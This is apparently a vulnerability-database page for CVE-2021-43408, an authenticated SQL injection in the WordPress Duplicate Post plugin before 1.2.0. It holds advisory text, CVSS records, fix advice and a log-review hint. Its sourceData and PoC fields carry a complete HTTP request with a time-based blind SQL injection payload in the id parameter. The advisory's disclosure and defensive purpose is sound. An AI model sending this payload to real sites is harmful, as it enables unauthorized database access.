Description
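The plugin does not properly sanitise and escape the id parameter passed to the cdp_action_handling AJAX action, which could allow users with access to the plugin (administrators by default) to perform SQL injection attacks. The records below identify the affected plugin as Duplicate Post before 1.2.0 (CVE-2021-43408); updating to 1.2.0 or later is the stated fix. The plugin can also be configured to grant access to the Editor, Author, Contributor and Subscriber roles, so sites that have widened access should treat every such account as able to reach the vulnerable action. When reviewing web logs, requests to /wp-admin/admin-ajax.php with action=cdp_action_handling and an id value that is not a plain integer are worth a closer look.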
Related
{"id": "WPEX-ID:D2B0A86B-3964-47ED-89B3-7350B4395B4B", "vendorId": null, "type": "wpexploit", "bulletinFamily": "exploit", "title": "Duplicate Post < 1.2.0 - Authenticated SQL Injection", "description": "The plugin does not properly sanitise and escape the id parameter passed to the cdp_action_handling AJAX action, which could allow user having access to the plugin (by default admins) to perform SQL Injection attacks\n", "published": "2021-10-25T00:00:00", "modified": "2021-11-21T09:13:49", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "", "reporter": "wpvulndb", "references": ["https://appcheck-ng.com/security-advisory-duplicate-post-wordpress-plugin-sql-injection-vulnerability/"], "cvelist": ["CVE-2021-43408"], "immutableFields": [], "lastseen": "2021-11-26T19:32:11", "viewCount": 39, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0919"]}, {"type": "cve", "idList": ["CVE-2021-43408"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:D2B0A86B-3964-47ED-89B3-7350B4395B4B"]}], "rev": 
4}, "score": {"value": 5.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0919"]}, {"type": "cve", "idList": ["CVE-2021-43408"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:D2B0A86B-3964-47ED-89B3-7350B4395B4B"]}]}, "exploitation": null, "vulnersScore": 5.3}, "sourceData": "POST /wp-admin/admin-ajax.php HTTP/1.1\r\nContent-Length: 229\r\nAccept: */*\r\nX-Requested-With: XMLHttpRequest\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCookie: wordpress_3d2361ff3a8f0d..(truncated)\r\nConnection: close\r\n\r\naction=cdp_action_handling&token=cdp&f=copy_post&origin=tooltip&id%5B%5D=1%20and%20(select*from(select(sleep(9)))a)--%20&data%5Btype%5D=copy-quick&data%5Btimes%5D=1&data%5Bsite%5D=-1&data%5Bprofile%5D=default&data%5Bswap%5D=false\r\n", "generation": 0, "_state": {"dependencies": 1646312654}}
{"patchstack": [{"lastseen": "2022-06-01T19:29:06", "description": "Authenticated SQL Injection (SQLi) vulnerability discovered by AppCheck in WordPress Duplicate Post plugin (versions <= 1.1.9).\n\n## Solution\n\n\r\n Update the WordPress Duplicate Post plugin to the latest available version (at least 1.2.0).\r\n ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-25T00:00:00", "type": "patchstack", "title": "WordPress Duplicate Post plugin <= 1.1.9 - Authenticated SQL Injection (SQLi) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43408"], "modified": "2021-10-25T00:00:00", "id": "PATCHSTACK:7172D8C7B449016928B827FE834E4428", "href": "https://patchstack.com/database/vulnerability/copy-delete-posts/wordpress-duplicate-post-plugin-1-1-9-authenticated-sql-injection-sqli-vulnerability", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "wpvulndb": [{"lastseen": "2021-11-26T19:32:11", "description": "The plugin does not properly sanitise and escape the id parameter passed to the cdp_action_handling AJAX action, which could allow user having access to the 
plugin (by default admins) to perform SQL Injection attacks\n\n### PoC\n\nPOST /wp-admin/admin-ajax.php HTTP/1.1 Content-Length: 229 Accept: */* X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: wordpress_3d2361ff3a8f0d..(truncated) Connection: close action=cdp_action_handling&token;=cdp&f;=copy_post&origin;=tooltip&id;%5B%5D=1%20and%20(select*from(select(sleep(9)))a)--%20&data;%5Btype%5D=copy-quick&data;%5Btimes%5D=1&data;%5Bsite%5D=-1&data;%5Bprofile%5D=default&data;%5Bswap%5D=false \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-25T00:00:00", "type": "wpvulndb", "title": "Duplicate Post < 1.2.0 - Authenticated SQL Injection", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43408"], "modified": "2021-11-21T09:13:49", "id": "WPVDB-ID:D2B0A86B-3964-47ED-89B3-7350B4395B4B", "href": "https://wpscan.com/vulnerability/d2b0a86b-3964-47ed-89b3-7350b4395b4b", "sourceData": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "checkpoint_advisories": 
[{"lastseen": "2022-02-16T19:30:26", "description": "An SQL injection vulnerability exists in WordPress Duplicate Post Plugin. Successful exploitation of this vulnerability would allow a remote attacker to execute arbitrary SQL commands on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-15T00:00:00", "type": "checkpoint_advisories", "title": "WordPress Duplicate Post Plugin SQL Injection (CVE-2021-43408)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43408"], "modified": "2021-12-15T00:00:00", "id": "CPAI-2021-0919", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T19:41:07", "description": "The \"Duplicate Post\" WordPress plugin up to and including version 1.1.9 is vulnerable to SQL Injection. SQL injection vulnerabilities occur when client supplied data is included within an SQL Query insecurely. SQL Injection can typically be exploited to read, modify and delete SQL table data. 
In many cases it also possible to exploit features of SQL server to execute system commands and/or access the local file system. This particular vulnerability can be exploited by any authenticated user who has been granted access to use the Duplicate Post plugin. By default, this is limited to Administrators, however the plugin presents the option to permit access to the Editor, Author, Contributor and Subscriber roles.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-19T16:15:00", "type": "cve", "title": "CVE-2021-43408", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43408"], "modified": "2021-11-24T16:53:00", "cpe": ["cpe:/a:duplicate_post_project:duplicate_post:1.1.9"], "id": "CVE-2021-43408", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-43408", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:duplicate_post_project:duplicate_post:1.1.9:*:*:*:*:wordpress:*:*"]}], "githubexploit": [{"lastseen": "2022-05-31T04:57:14", "description": "# CVE-2021-43408: Wordpress Plugin Duplicate Post version 1.1.9 ...", 
"cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-31T03:00:27", "type": "githubexploit", "title": "Exploit for SQL Injection in Duplicate Post Project Duplicate Post", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43408"], "modified": "2022-05-31T03:17:53", "id": "937004C6-1E3E-5F32-9979-879BB411E877", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}]}